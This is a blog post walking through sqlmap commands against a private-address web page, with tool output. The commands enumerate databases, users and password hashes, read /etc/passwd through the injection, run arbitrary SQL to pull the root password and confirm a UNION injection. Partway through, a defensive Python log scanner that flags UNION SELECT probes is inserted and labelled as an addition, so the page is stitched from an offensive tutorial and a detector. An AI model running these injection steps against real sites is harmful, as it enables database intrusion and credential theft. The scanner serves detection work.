CrackKay

Sharing the wonderful online world with you. Member of the 486174 group

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db


current database: 'testdb' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users 


database management system users [5]: 
[*] 'debian-sys-maint'@'localhost' 
[*] 'root'@'127.0.0.1' 
[*] 'root'@'leboyer' 
[*] 'root'@'localhost' 
[*] 'testuser'@'localhost' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords


database management system users password hashes: 
[*] debian-sys-maint [1]: 
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
[*] root [1]: 
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY 
[*] testuser [1]: 
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs 


available databases [3]: 
[*] information_schema 
[*] mysql 
[*] testdb 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"


Database: information_schema 
[16 tables] 
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS                            |
| COLUMN_PRIVILEGES                     |
| COLUMNS                               |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEMATA                              |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLES                                |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"


Database: mysql 
Table: user 
[37 columns] 
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| Alter_priv            | enum |
| Alter_routine_priv    | enum |
| Create_priv           | enum |
| Create_routine_priv   | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv      | enum |
| Create_view_priv      | enum |
| Delete_priv           | enum |
| Drop_priv             | enum |
| Execute_priv          | enum |
| File_priv             | enum |
| Grant_priv            | enum |
| Host                  | char |
| Index_priv            | enum |
| Insert_priv           | enum |
| Lock_tables_priv      | enum |
| max_connections       | int  |
| max_questions         | int  |
| max_updates           | int  |
| max_user_connections  | int  |
| Password              | char |
| Process_priv          | enum |
| References_priv       | enum |
| Reload_priv           | enum |
| Repl_client_priv      | enum |
| Repl_slave_priv       | enum |
| Select_priv           | enum |
| Show_db_priv          | enum |
| Show_view_priv        | enum |
| Shutdown_priv         | enum |
| ssl_cipher            | blob |
| ssl_type              | enum |
| Super_priv            | enum |
| Update_priv           | enum |
| User                  | char |
| x509_issuer           | blob |
| x509_subject          | blob |
+-----------------------+------+


13. Display the contents of a specified file; generally used with PHP targets
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd


/etc/passwd: 
--- 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/false 
backup:x:34:34:backup:/var/backups:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false 
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash 
--- 


14. Execute your own SQL statement.


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"


[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' 
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY 
[hh:mm:19] [INFO] performed 118 queries in 0 seconds 
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 


15. UNION injection
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-check


valid union: 'http://192.168.1.47/page.php?id=1UNION ALL SELECT NULL, NULL, NULL--&cat=2' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --union-use --banner


[...] 
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id' 
[hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability 
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' 
[...] 
[hh:mm:24] [INFO] fetching banner 
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 
[hh:mm:24] [INFO] performed 1 queries in 0 seconds 
banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 
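A defender-side counterpart to the UNION probes above, added here as an example (it is not part of the original post and not sqlmap code): a small Python scanner that URL-decodes requests from access-log lines, expands MySQL CHAR() calls so that the CHAR(95,95,83,84,...) wrappers in the request above read as the __START__/__STOP__ markers they build, and flags UNION SELECT probes. The log lines are constructed, not real traffic, and mirror the requests shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not real traffic). The query
# strings reproduce the probes shown above, URL-encoded as a server logs them.
SAMPLE_LOG = """\
192.168.1.10 - - [23/Apr/2013:20:48:01 +0800] "GET /page.php?id=1&cat=2 HTTP/1.1" 200 512
192.168.1.10 - - [23/Apr/2013:20:48:02 +0800] "GET /page.php?id=1UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 512
192.168.1.10 - - [23/Apr/2013:20:48:03 +0800] "GET /page.php?id=1UNION%20ALL%20SELECT%20CONCAT(CHAR(95,95,83,84,65,82,84,95,95),%20VERSION(),%20CHAR(95,95,83,84,79,80,95,95)),%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 540
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_RE = re.compile(r'CHAR\(([\d,\s]+)\)', re.IGNORECASE)
# No leading \b: the request above glues the payload to the value ("id=1UNION"),
# so a word boundary before UNION would miss exactly this traffic.
UNION_RE = re.compile(r'UNION\s+(?:ALL\s+)?SELECT\b', re.IGNORECASE)


def decode_char_calls(text):
    """Replace every MySQL CHAR(n, n, ...) call with the quoted string it builds,
    so obfuscated literals such as the __START__/__STOP__ markers become readable."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return repr("".join(chr(c) for c in codes))
    return CHAR_RE.sub(repl, text)


def analyse_line(line):
    """Return the decoded request target plus a list of findings, or None when
    the line carries no HTTP request."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    decoded = decode_char_calls(unquote_plus(match.group(1)))
    findings = []
    if UNION_RE.search(decoded):
        findings.append("union-select probe")
    if "__START__" in decoded and "__STOP__" in decoded:
        findings.append("sqlmap output delimiters")
    if "--" in decoded:
        findings.append("sql comment terminator")  # heuristic, may fire on benign input
    return {"target": decoded, "findings": findings}


def scan_log(text):
    """Analyse every line and keep only those with at least one finding."""
    return [r for r in (analyse_line(l) for l in text.splitlines()) if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(", ".join(hit["findings"]), "->", hit["target"])
```

Run over real logs, the decoded target is what to forward to a ticket or SIEM rule, since the raw URL-encoded form hides both the UNION keyword and the marker strings.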


16. Save the injection session to a file, and resume it later from that file. This is very convenient and one of sqlmap's major features: you can interrupt an injection and continue it when you have time.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"


[...] 
[hh:mm:09] [INFO] fetching banner 
[hh:mm:09] [INFO] query: VERSION() 
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log 
[hh:mm:11] [INFO] performed 139 queries in 1 seconds 
banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --banner -o "sqlmap.log" --resume


[...] 
[hh:mm:13] [INFO] fetching banner 
[hh:mm:13] [INFO] query: VERSION() 
[hh:mm:13] [INFO] retrieved the length of query: 26 
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb 
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log 
banner:

 

posted on 2013-04-23 20:48 by CrackKay